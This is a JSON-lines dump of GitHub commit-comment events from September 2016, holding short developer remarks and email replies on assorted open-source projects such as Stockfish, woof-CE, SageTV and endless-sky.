{"id":"4544824578","type":"CommitCommentEvent","actor":{"login":"Pinecode99"},"repo":{"name":"Pinecode99/SOreport"},"payload":{"comment":{"id":18975208,"position":null,"line":null,"path":null,"commit_id":"f6dc6ef6953d291a474d08c3ceba07eb1f988e34","created_at":"2016-09-10T22:20:49Z","updated_at":"2016-09-10T22:20:49Z","body":"changes ok"}},"created_at":"2016-09-10T22:20:49Z"}
{"id":"4544827000","type":"CommitCommentEvent","actor":{"login":"vizv"},"repo":{"name":"tj/terminal-table"},"payload":{"comment":{"id":18975210,"position":9,"line":55,"path":"lib/terminal-table/cell.rb","commit_id":"eaf8b777bafd1a06f17a8901a36be226debc5055","created_at":"2016-09-10T22:22:49Z","updated_at":"2016-09-10T22:22:49Z","body":"@rrrene May I ask why `str = str.gsub(/\\x1b(\\[|\\(|\\))[;?0-9]*[0-9A-Za-z]/, '')` repeats twice?"}},"created_at":"2016-09-10T22:22:49Z"}
{"id":"4544827700","type":"CommitCommentEvent","actor":{"login":"frontierpsycho"},"repo":{"name":"thiderman/drunkenfall"},"payload":{"comment":{"id":18975211,"position":29,"line":29,"path":"facebook.go","commit_id":"e89f05d538f5b55e5404e4da9b0a753aec5607b7","created_at":"2016-09-10T22:23:24Z","updated_at":"2016-09-10T22:23:24Z","body":"Can I has supersecret variables pls?"}},"created_at":"2016-09-10T22:23:24Z"}
{"id":"4544829207","type":"CommitCommentEvent","actor":{"login":"vizv"},"repo":{"name":"tj/terminal-table"},"payload":{"comment":{"id":18975213,"position":23,"line":34,"path":"lib/terminal-table/cell.rb","commit_id":"41fa4a3943628315981d1241bffa0d62e4d54442","created_at":"2016-09-10T22:24:44Z","updated_at":"2016-09-10T22:24:44Z","body":"Maybe I should ask @rrrene for this."}},"created_at":"2016-09-10T22:24:44Z"}
{"id":"4544829622","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft-contrib/yiiframework.com"},"payload":{"comment":{"id":18975215,"position":null,"line":null,"path":null,"commit_id":"0986fb4a47d86288a433ef96b7377e9c83bbdfdf","created_at":"2016-09-10T22:25:03Z","updated_at":"2016-09-10T22:25:03Z","body":"https://github.com/yiisoft-contrib/yiiframework.com/commit/35ad912764cd1e4b73f2e3fe0ac2aa325502fa0e"}},"created_at":"2016-09-10T22:25:03Z"}
{"id":"4544832224","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18975216,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-10T22:27:12Z","updated_at":"2016-09-10T22:27:12Z","body":"I was going to code, but flirted instead. In my distraction, I hit save instead of close. "}},"created_at":"2016-09-10T22:27:12Z"}
{"id":"4544833903","type":"CommitCommentEvent","actor":{"login":"fraser1978"},"repo":{"name":"kevjs1982/eetv-webui"},"payload":{"comment":{"id":18975217,"position":null,"line":null,"path":null,"commit_id":"8cd482dbbab10c7b93363c0af4355c6ef582628c","created_at":"2016-09-10T22:28:24Z","updated_at":"2016-09-10T22:28:24Z","body":"Hi again kev. Quick question. I wondered if all functionality of eetv box\nremains outside of contract? I.e. Contract has ended can I still use the\nbox to record or for replay etc? If not I'm thinking of using the 1tb hard\ndrive for my desktop system. How would I extract the recordings? Are they\nin a strange format like sky recordings? Will i have to connect as external\nto prevent system from automatically corrupting the drive as it does with\nsky hard drives? Look forward to your advice.\n\nThanks\n\nFraser\n\nOn 25 Feb 2016 17:16, \"kevjs1982\" <notifications@github.com> wrote:\n\n> The playing videos on the EETV box is due to an API call that's available\n> (the box is similar to one used by Telstra in Australia). The hardware and\n> Austrlian box have the ability to play files from a USB stick or via DNLA,\n> and the EETV does put up a notice that a USB stick has been inserted -\n> however it appears that EETV have disabled the functionality that makes\n> this useful :(\n>\n> On Thu, 25 Feb 2016 at 17:00 fraser1978 <notifications@github.com> wrote:\n>\n> > I wonder if there was a way of sending video files to hard drive on Ee TV\n> > box to watch on main telly. I watch a lot of downloads you see\n> > On 25 Feb 2016 12:16, \"Fraser Dalgleish\" <fraserdalgleish@gmail.com>\n> > wrote:\n> >\n> > > Oh that's cool. Well thanks again for your help. Can I ask you one more\n> > > question though please? How does the playing videos on the Ee box over\n> > http\n> > > work exactly?\n> > > On 25 Feb 2016 09:05, \"kevjs1982\" <notifications@github.com> wrote:\n> > >\n> > >> The WebUI allows you to search for programmes (only a channel at a\n> time\n> > >> though) and set timers (including series links) for them.\n> > >>\n> > >> Not had any need for the EPG on XBMC as I rarely watch live TV, only\n> > >> really\n> > >> did it so I could watch recordings in the bedroom/kitchen.\n> > >>\n> > >>\n> > >> On Thu, 25 Feb 2016 at 01:25 fraser1978 <notifications@github.com>\n> > wrote:\n> > >>\n> > >> > Hello again Kev,\n> > >> >\n> > >> > That's fantastic, thanks for that! Excellent work mate, exactly\n> what I\n> > >> > needed. Is there any plans to build on the catchup section (if its\n> > >> actually\n> > >> > theoretically possible) and maybe a record setting option? Also, is\n> > >> there\n> > >> > any way to add EPG and choose programmes as required?\n> > >> >\n> > >> > I'm definitely going to consider looking at the webui stuff in the\n> > >> future\n> > >> > as I have some experience helping a friend build his website with\n> some\n> > >> php\n> > >> > code. Its certainly an interesting subject for me.\n> > >> >\n> > >> > I honestly highly commend you for your work on this, as after many\n> > >> searches\n> > >> > on google you seem to be the only person who is expanding on an\n> > already\n> > >> > lacking service. So hats off to ya pal!\n> > >> >\n> > >> > Thanks again.\n> > >> >\n> > >> > Regards,\n> > >> >\n> > >> > Fraser\n> > >> >\n> > >> > Hi fraser1978.\n> > >> >\n> > >> > I've updated the readme for the XBMC plugin at - should allow you to\n> > get\n> > >> > started\n> > >> > https://github.com/kevjs1982/xbmcplugins/blob/master/README.md\n> (Alas\n> > my\n> > >> > Kodi/XBMC installs are a couple of years old so these haven't been\n> > >> tested\n> > >> > with the latest ones).\n> > >> >\n> > >> > The web-ui requires knowledge of setting up webservers and PHP which\n> > is\n> > >> a\n> > >> > bit on the complex side.\n> > >> >\n> > >> > —\n> > >> > Reply to this email directly or view it on GitHub\n> > >> > <\n> > >> >\n> > >>\n> > https://github.com/kevjs1982/eetv-webui/commit/\n> 8cd482dbbab10c7b93363c0af4355c6ef582628c#commitcomment-16298393\n> > >> > >\n> > >> > .\n> > >> >\n> > >> > —\n> > >> > Reply to this email directly or view it on GitHub\n> > >> > <\n> > >>\n> > https://github.com/kevjs1982/eetv-webui/commit/\n> 8cd482dbbab10c7b93363c0af4355c6ef582628c#commitcomment-16314954\n> > >> >\n> > >> > .\n> > >> >\n> > >>\n> > >> —\n> > >> Reply to this email directly or view it on GitHub\n> > >> <\n> > https://github.com/kevjs1982/eetv-webui/commit/\n> 8cd482dbbab10c7b93363c0af4355c6ef582628c#commitcomment-16320191\n> > >\n> > >> .\n> > >>\n> > >\n> >\n> > —\n> > Reply to this email directly or view it on GitHub\n> > <https://github.com/kevjs1982/eetv-webui/commit/\n> 8cd482dbbab10c7b93363c0af4355c6ef582628c#commitcomment-16332006>\n> > .\n> >\n>\n> —\n> Reply to this email directly or view it on GitHub\n> <https://github.com/kevjs1982/eetv-webui/commit/8cd482dbbab10c7b93363c0af4355c6ef582628c#commitcomment-16332402>\n> .\n>\n"}},"created_at":"2016-09-10T22:28:24Z"}
{"id":"4544836839","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18975219,"position":null,"line":null,"path":null,"commit_id":"23b271c9582c5c5e1ab60b8a356facd69e90f905","created_at":"2016-09-10T22:30:46Z","updated_at":"2016-09-10T22:30:46Z","body":"Please note : all credits goes to @cydh (search, implementation & co.)"}},"created_at":"2016-09-10T22:30:46Z"}
{"id":"4544838253","type":"CommitCommentEvent","actor":{"login":"RK900"},"repo":{"name":"LHSCyberSecurityClub/lhscybersecurityclub.github.io"},"payload":{"comment":{"id":18975221,"position":null,"line":null,"path":null,"commit_id":"c8d3e8deeb5b4765891ca75ae23e62d9e04c458e","created_at":"2016-09-10T22:31:55Z","updated_at":"2016-09-10T22:31:55Z","body":"I don't see this image"}},"created_at":"2016-09-10T22:31:55Z"}
{"id":"4544838951","type":"CommitCommentEvent","actor":{"login":"vikranth22446"},"repo":{"name":"LHSCyberSecurityClub/lhscybersecurityclub.github.io"},"payload":{"comment":{"id":18975222,"position":null,"line":null,"path":null,"commit_id":"c8d3e8deeb5b4765891ca75ae23e62d9e04c458e","created_at":"2016-09-10T22:32:23Z","updated_at":"2016-09-10T22:32:23Z","body":"scroll down rohan\n\nOn Sat, Sep 10, 2016 at 3:31 PM, Rohan Koodli <notifications@github.com>\nwrote:\n\n> I don't see this image\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/LHSCyberSecurityClub/lhscybersecurityclub.github.io/commit/c8d3e8deeb5b4765891ca75ae23e62d9e04c458e#commitcomment-18975221>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKQSCtqosSf9sQPCXiETdK9GTWLK1MmJks5qoy_bgaJpZM4J52PN>\n> .\n>\n\n\n\n-- \nVikranth\n"}},"created_at":"2016-09-10T22:32:23Z"}
{"id":"4544841590","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975225,"position":null,"line":null,"path":null,"commit_id":"0cf6d8032c673c1df2780c682ea1b4dc1ab36c24","created_at":"2016-09-10T22:34:18Z","updated_at":"2016-09-10T22:34:18Z","body":"actually the busybox losetup behaves very much like losetup-FULL, at least the commands i see are used in woofce... simple commands and losetup-FULL supports them all the same way...\r\n\r\ni just fixed a bug regarding the return value/exit code and add code for busybox as a fallback method when losetup-FULL is not usable.. https://github.com/puppylinux-woof-CE/woof-CE/commit/1354d6ca23f530ee2a872a72697ee7b9a2266808 ..  i guess that's it"}},"created_at":"2016-09-10T22:34:18Z"}
{"id":"4544842065","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975226,"position":null,"line":null,"path":null,"commit_id":"4721b598ccb3fd9bd71c0ac392b73583ff442d3c","created_at":"2016-09-10T22:34:35Z","updated_at":"2016-09-10T22:34:35Z","body":"I think these explosions are too loud...."}},"created_at":"2016-09-10T22:34:35Z"}
{"id":"4544842283","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975228,"position":null,"line":null,"path":null,"commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T22:34:44Z","updated_at":"2016-09-10T22:34:44Z","body":"IT HAPPENED\r\nEVERYONE\r\nIT HAPPENED"}},"created_at":"2016-09-10T22:34:44Z"}
{"id":"4544843490","type":"CommitCommentEvent","actor":{"login":"Aaronponce"},"repo":{"name":"Aaronponce/pruebaMetodologiaDise-o"},"payload":{"comment":{"id":18975232,"position":null,"line":null,"path":null,"commit_id":"6c3bdc1e4e9edf0e200b665810fda8f76e1836cb","created_at":"2016-09-10T22:35:36Z","updated_at":"2016-09-10T22:35:36Z","body":"sdsd"}},"created_at":"2016-09-10T22:35:36Z"}
{"id":"4544843633","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975233,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-10T22:35:43Z","updated_at":"2016-09-10T22:35:43Z","body":"New test: http://tests.stockfishchess.org/tests/view/57d489790ebc59030fbe51a2\r\nThat may fail quickly... it's complicated to tune!"}},"created_at":"2016-09-10T22:35:43Z"}
{"id":"4544845620","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"ashfurrow/playgroundbook"},"payload":{"comment":{"id":18975238,"position":5,"line":3,"path":"lib/linter/chapter_linter.rb","commit_id":"8c43d5d6ff3cd49d829ca548ca66bb0f4f05a697","created_at":"2016-09-10T22:37:13Z","updated_at":"2016-09-10T22:37:13Z","body":"these felt overly verbose"}},"created_at":"2016-09-10T22:37:13Z"}
{"id":"4544848189","type":"CommitCommentEvent","actor":{"login":"JDVila"},"repo":{"name":"JsjRoboticsClassroom/signboard-group-5"},"payload":{"comment":{"id":18975243,"position":null,"line":null,"path":null,"commit_id":"14fced8d1e627d967e50e9cf8adbb009d679a322","created_at":"2016-09-10T22:39:25Z","updated_at":"2016-09-10T22:39:25Z","body":"This looks great! Thank you for your contribution!"}},"created_at":"2016-09-10T22:39:25Z"}
{"id":"4544848416","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":18975244,"position":5,"line":3637,"path":"sql/base/mangos.sql","commit_id":"7b37f7fe79809799e184cb60d096f574281afcf1","created_at":"2016-09-10T22:39:37Z","updated_at":"2016-09-10T22:39:37Z","body":"@cala this has to be updated in classicdb as well as we also have it spelled 'Legionnare', and classic should have had a revision update, (sorry guys), but it will get a revision update with the commit we recently discussed on IRC which will get pushed very soon (so can we maybe just skip this one?), we just gotta remember to correct this db side as well."}},"created_at":"2016-09-10T22:39:37Z"}
{"id":"4544852071","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975249,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T22:42:47Z","updated_at":"2016-09-10T22:42:47Z","body":"Ok, i've just done a build and have limited time!\r\n\r\nI have the previous version. What is the bug? Just that losetup-FULL may not exist and fallback to busybox losetup?"}},"created_at":"2016-09-10T22:42:47Z"}
{"id":"4544854604","type":"CommitCommentEvent","actor":{"login":"atarijeff"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18975253,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-10T22:44:41Z","updated_at":"2016-09-10T22:44:41Z","body":"I have made the change and it seems to be testing OK locally. My local EPG is very limited. I did however find that all of my HD-Homerun tuners have disappeared from the Add Tuner screen. Reverting back to the previous version works OK."}},"created_at":"2016-09-10T22:44:41Z"}
{"id":"4544856379","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975254,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T22:45:59Z","updated_at":"2016-09-10T22:45:59Z","body":"Oh.. looks like I have to rebuild .. again. :sob: "}},"created_at":"2016-09-10T22:45:59Z"}
{"id":"4544865112","type":"CommitCommentEvent","actor":{"login":"schuster"},"repo":{"name":"nuprl/cs2500-server"},"payload":{"comment":{"id":18975258,"position":null,"line":null,"path":null,"commit_id":"f0eb9389b7086c0f9a02b7deb0530d5d80cc7893","created_at":"2016-09-10T22:51:57Z","updated_at":"2016-09-10T22:51:57Z","body":"Fair point. I'll add that back in."}},"created_at":"2016-09-10T22:51:57Z"}
{"id":"4544865736","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":18975259,"position":null,"line":null,"path":null,"commit_id":"bb6da769bd26fd5f831deb0edf886c7808ec974b","created_at":"2016-09-10T22:52:25Z","updated_at":"2016-09-10T22:52:25Z","body":"FWIW, I think this behaviour is wrong.  That’s why I left it in there like that.  To start a discussion.\n\nFeels to me the number of permutations of the empty list is 0.  And hence it should just return an empty list.\n\n> On 10 Sep 2016, at 16:34, Brad Gilbert <notifications@github.com> wrote:\n> \n> The count of the number of permutations of an empty set is 1\n> \n> Also the Iterator class can know exactly how many elements it would produce, so a count-only could be added.\n> \n> I think the line with:\n> \n> permutations(0).map: { self[@$_] }\n> \n> could be replaced with just:\n> \n> ((),).Seq\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-10T22:52:25Z"}
{"id":"4544867772","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18975262,"position":null,"line":null,"path":null,"commit_id":"27bc34f1e471991e43df028edc51159b12405120","created_at":"2016-09-10T22:54:15Z","updated_at":"2016-09-10T22:54:15Z","body":"This breaks almost all NixOS tests: http://hydra.nixos.org/build/40244686#tabs-constituents"}},"created_at":"2016-09-10T22:54:15Z"}
{"id":"4544868273","type":"CommitCommentEvent","actor":{"login":"sandeepreddy3636"},"repo":{"name":"sandeepreddy3636/first-repo"},"payload":{"comment":{"id":18975263,"position":5,"line":5,"path":"sand1","commit_id":"5a059e9e674159d30af3575c4d706bebfdd342cb","created_at":"2016-09-10T22:54:46Z","updated_at":"2016-09-10T22:54:46Z","body":"sandeep\r\n"}},"created_at":"2016-09-10T22:54:46Z"}
{"id":"4544870913","type":"CommitCommentEvent","actor":{"login":"MonaSitlani"},"repo":{"name":"MonaSitlani/ben"},"payload":{"comment":{"id":18975268,"position":null,"line":null,"path":null,"commit_id":"1fd254ecde39b0b4854e2b55f361023754a9ac16","created_at":"2016-09-10T22:57:16Z","updated_at":"2016-09-10T22:57:16Z","body":"changes made"}},"created_at":"2016-09-10T22:57:16Z"}
{"id":"4544872001","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975269,"position":null,"line":null,"path":null,"commit_id":"2cb26d1f1155c7bfaf7fe7825e2a59c7bb4c7dad","created_at":"2016-09-10T22:58:17Z","updated_at":"2016-09-10T22:58:17Z","body":"Your calculation of number of pawn islands with bitboard is wrong, you should use instead:\r\n\r\n````\r\nb = e->semiopenFiles[Us] ^ 0xFF;\r\ne->islands[Us] = popcount(b & ~(b >> 1));\r\n````\r\n\r\nHope this helps, Stéphane"}},"created_at":"2016-09-10T22:58:17Z"}
{"id":"4544872459","type":"CommitCommentEvent","actor":{"login":"feeley"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":18975271,"position":null,"line":null,"path":null,"commit_id":"fc75d7363281a72a9b864f0d3d17889136a4b743","created_at":"2016-09-10T22:58:44Z","updated_at":"2016-09-10T22:58:44Z","body":"There were other problems, in particular with vector pipes (possible segfault when using get-output-u8vector mixed with read-char), and also the accounting of character position was incorrect."}},"created_at":"2016-09-10T22:58:44Z"}
{"id":"4544872787","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18975273,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-10T22:59:04Z","updated_at":"2016-09-10T22:59:04Z","body":"@wakaber \r\nХочу расстроить, там сенсор камеры другой, у иксперии Z3 тоже такая же камера, кажется, ну или похожая"}},"created_at":"2016-09-10T22:59:04Z"}
{"id":"4544873371","type":"CommitCommentEvent","actor":{"login":"dgilperez"},"repo":{"name":"medihack/make_flaggable"},"payload":{"comment":{"id":18975275,"position":null,"line":null,"path":null,"commit_id":"95ad66bf790a98f876634f0c0169fd94c2298ebd","created_at":"2016-09-10T22:59:37Z","updated_at":"2016-09-10T22:59:37Z","body":"I don't think this is Rails 3 compatible. I'd either look for another approach or drop Rails 3 support. "}},"created_at":"2016-09-10T22:59:37Z"}
{"id":"4544875362","type":"CommitCommentEvent","actor":{"login":"myrsloik"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":18975280,"position":30,"line":2073,"path":"src/core/simplefilters.c","commit_id":"df42dcb27b95e01fff5c693ffbe6a921fcdc0dd6","created_at":"2016-09-10T23:01:09Z","updated_at":"2016-09-10T23:01:09Z","body":"Fine, you win"}},"created_at":"2016-09-10T23:01:09Z"}
{"id":"4544875636","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975282,"position":110,"line":2254,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T23:01:24Z","updated_at":"2016-09-10T23:01:24Z","body":"> The elevator opens up to a wide and vaulted hallway lined on either side by Wanderers dressed in black, come to pay their last respects to Rek.\r\n\r\nThis doesn't make sense to me."}},"created_at":"2016-09-10T23:01:24Z"}
{"id":"4544876408","type":"CommitCommentEvent","actor":{"login":"CreeperMario"},"repo":{"name":"vgmoose/hbas"},"payload":{"comment":{"id":18975285,"position":null,"line":null,"path":null,"commit_id":"a8182906f22f2bd0c8fe4b43c8426cd08b2a9210","created_at":"2016-09-10T23:02:05Z","updated_at":"2016-09-10T23:02:05Z","body":"This _**MIGHT**_ fix the exception handler for you...\r\nYou see how on lines 66068 of exception.h you have `OSSetExceptionCallback(number, &exception_handler);` In which the number represents the exception type (currently 2, 3 and 6\r\nPerhaps try adding exception handlers for exception types 0-14? (Source: https://github.com/decaf-emu/wut/blob/master/include/coreinit/exception.h)"}},"created_at":"2016-09-10T23:02:05Z"}
{"id":"4544877013","type":"CommitCommentEvent","actor":{"login":"stevedapper"},"repo":{"name":"ThemeFuse/Unyson-Builder-Extension"},"payload":{"comment":{"id":18975287,"position":null,"line":null,"path":null,"commit_id":"d74366487f42fcc56bf3342b65470f6eced18a85","created_at":"2016-09-10T23:02:34Z","updated_at":"2016-09-10T23:02:34Z","body":"HI dear, I've looked at this class file and it seems like it's been already updated by you ther latest release. Your line 10 through 12 are identical to mine while line 13 has this on it: \t\tspl_autoload_register(array($this, '_spl_autoload'));  \r\n\r\nyou're not indicating it here. \r\n\r\nLong story short, I still have the error message and can't visualise \"page builder\" on pages, blogs, etc. \r\n\r\nCan you please help? I have a show tomorrow and I need to update some pages and I'm stuck :(\r\n\r\nThx a million\r\n"}},"created_at":"2016-09-10T23:02:34Z"}
{"id":"4544878104","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975290,"position":null,"line":null,"path":null,"commit_id":"2cb26d1f1155c7bfaf7fe7825e2a59c7bb4c7dad","created_at":"2016-09-10T23:03:24Z","updated_at":"2016-09-10T23:03:24Z","body":"Thanks @snicolet, actually it should be the same, as storing it in an int gives the same bench..."}},"created_at":"2016-09-10T23:03:24Z"}
{"id":"4544878408","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18975292,"position":44,"line":1219,"path":"SQF/dayz_code/system/player_monitor.fsm","commit_id":"ed3227fa7a3dd879083f43558a402a651afd56ce","created_at":"2016-09-10T23:03:38Z","updated_at":"2016-09-10T23:03:38Z","body":"I actually only call the forcesave to set the ServerMagArray variable for each player, but I can probably just do this serverside in a different file"}},"created_at":"2016-09-10T23:03:38Z"}
{"id":"4544878824","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975294,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:03:44Z","updated_at":"2016-09-10T23:03:44Z","body":"i added this script about an hour ago or less\r\n\r\nThe bug: fix return value/exit code $RETVAL instead of $?... and then add more code\r\n\r\n the script supports both losetups properly, all versions. but losetup-FULL is preferred, and it will fallback to busybox if losetup-FULL is not found"}},"created_at":"2016-09-10T23:03:44Z"}
{"id":"4544880000","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18975296,"position":null,"line":null,"path":null,"commit_id":"215f3a9b1f1818882bb8a8aca3ca5fa257ade627","created_at":"2016-09-10T23:04:45Z","updated_at":"2016-09-10T23:04:45Z","body":"It would only impact ST strings.  Data read from the input file will be in a 'large' enough buffer to not be a problem (I think).  BUT this does deal with any 'short' but valid hash."}},"created_at":"2016-09-10T23:04:45Z"}
{"id":"4544880923","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975299,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:05:31Z","updated_at":"2016-09-10T23:05:31Z","body":"It's ok, rebuild is almost done with this commit. Quick test and upload (both 32 and 64)"}},"created_at":"2016-09-10T23:05:31Z"}
{"id":"4544882092","type":"CommitCommentEvent","actor":{"login":"Narflex"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18975301,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-10T23:06:30Z","updated_at":"2016-09-10T23:06:30Z","body":"What files did you change when the test made all your HDHomeRun tuners\ndisappear? Was it only the Sage.jar file or did you install a whole new\nversion? That seems odd that would happen.\n\nJeff Kardatzke\nSent from my Android\n\nOn Sep 10, 2016 3:44 PM, \"Jeff Harrison\" <notifications@github.com> wrote:\n\n> I have made the change and it seems to be testing OK locally. My local EPG\n> is very limited. I did however find that all of my HD-Homerun tuners have\n> disappeared from the Add Tuner screen. Reverting back to the previous\n> version works OK.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/google/sagetv/commit/a75c8bdfb0726c7a09406dbf14803e5aa47a9c02#commitcomment-18975253>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANEIDEK8X5vMSTbKXu-l9bxQbiKcJpRvks5qozLagaJpZM4J5Ugp>\n> .\n>\n"}},"created_at":"2016-09-10T23:06:30Z"}
{"id":"4544882395","type":"CommitCommentEvent","actor":{"login":"warp-core"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18975303,"position":110,"line":2254,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-10T23:06:46Z","updated_at":"2016-09-10T23:06:46Z","body":"Why not? It is clear that when a Wanderer undergoes the most, they come out of it very different. Like a Time lord regenerating.\r\nI assume you're referring to the 'last respects' part."}},"created_at":"2016-09-10T23:06:46Z"}
{"id":"4544884061","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975306,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T23:08:15Z","updated_at":"2016-09-10T23:08:15Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-10T23:08:15Z"}
{"id":"4544884276","type":"CommitCommentEvent","actor":{"login":"juliandavidmr"},"repo":{"name":"petehunt/react-howto"},"payload":{"comment":{"id":18975308,"position":21,"line":15,"path":"README-es.md","commit_id":"5e9502ce45f8dbf9cb0065d8e8e569d3dc1ed522","created_at":"2016-09-10T23:08:26Z","updated_at":"2016-09-10T23:08:26Z","body":"Aca en Colombia muchos acostumbramos a aplicar CamelCase a las palabras. Pero podría dejarse todo en minuscula si crees que es mejor. "}},"created_at":"2016-09-10T23:08:26Z"}
{"id":"4544884802","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18975309,"position":null,"line":null,"path":null,"commit_id":"2cb26d1f1155c7bfaf7fe7825e2a59c7bb4c7dad","created_at":"2016-09-10T23:08:55Z","updated_at":"2016-09-10T23:08:55Z","body":"OK you're right! And I still don't understand why ;)"}},"created_at":"2016-09-10T23:08:55Z"}
{"id":"4544885373","type":"CommitCommentEvent","actor":{"login":"juliandavidmr"},"repo":{"name":"petehunt/react-howto"},"payload":{"comment":{"id":18975311,"position":124,"line":98,"path":"README-es.md","commit_id":"5e9502ce45f8dbf9cb0065d8e8e569d3dc1ed522","created_at":"2016-09-10T23:09:19Z","updated_at":"2016-09-10T23:09:19Z","body":"Gracias @javierbyte por las correcciones :+1: "}},"created_at":"2016-09-10T23:09:19Z"}
{"id":"4544886040","type":"CommitCommentEvent","actor":{"login":"Sesquipedalian"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18975313,"position":null,"line":null,"path":null,"commit_id":"2f667a06ff4984a665fefc8cdcd9e4e02a385f36","created_at":"2016-09-10T23:09:48Z","updated_at":"2016-09-10T23:09:48Z","body":"Thanks, @illori. Could you create a new issue to remind me to fix this?"}},"created_at":"2016-09-10T23:09:48Z"}
